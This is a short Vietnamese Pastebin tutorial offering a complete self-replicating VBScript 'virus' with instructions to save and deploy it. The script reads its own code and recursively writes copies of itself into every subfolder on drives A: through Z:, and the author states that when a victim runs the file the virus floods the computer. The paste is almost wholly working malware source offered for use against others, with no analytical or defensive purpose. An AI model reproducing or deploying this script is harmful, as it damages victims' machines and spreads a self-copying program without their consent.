adminvietnam

Tut virut loại 1 nhẹ nhất

Nov 24th, 2015
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.19 KB | None | 0 0
  1. Gõ vào noteap đoạn mã sau :
  2. 'Thuoc Doc !!!
  3. Dim fso,file,VBCopy
  4. Set fso=CreateObject("Scripting.FileSystemObject")
  5. Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  6. VBCopy=file.ReadAll
  7. FolderList("A:\")
  8. FolderList("B:\")
  9. FolderList("C:\")
  10. FolderList("D:\")
  11. FolderList("E:\")
  12. FolderList("F:\")
  13. FolderList("G:\")
  14. FolderList("H:\")
  15. FolderList("I:\")
  16. FolderList("J:\")
  17. FolderList("K:\")
  18. FolderList("L:\")
  19. FolderList("M:\")
  20. FolderList("N:\")
  21. FolderList("O:\")
  22. FolderList("P:\")
  23. FolderList("Q:\")
  24. FolderList("R:\")
  25. FolderList("S:\")
  26. FolderList("T:\")
  27. FolderList("U:\")
  28. FolderList("V:\")
  29. FolderList("X:\")
  30. FolderList("Y:\")
  31. FolderList("Z:\")
  32. FolderList("W:\")
  33.  
  34. Sub FolderList(FolderSpec)
  35. On Error Resume Next
  36. Dim f,f1,sf,COP,CAP
  37. Set f=fso.GetFolder(FolderSpec)
  38. set sf=f.SubFolders
  39. For Each f1 In sf
  40. Set COP=fso.CreateTextFile(f1.path & "\Virus Boss!!!!!!!.vbs")
  41. COP.write VBCopy
  42. Set CAP=fso.CreateTextFile(f1.path & "---Virus Boss!!!!!!!.vbs")
  43. CAP.write VBCopy
  44. FolderList(f1.Path)
  45. Next
  46. End sub
  47.  
  48.  
  49. Save lại bằng tên thuocdoc.vbs
  50. Khi nạn nhân chạy file này thì virus sẽ tràn ngập trong máy tính.
  51. ( Cả trong các thư mục và desktop ^_^). :*
Advertisement
Add Comment
Please, Sign In to add comment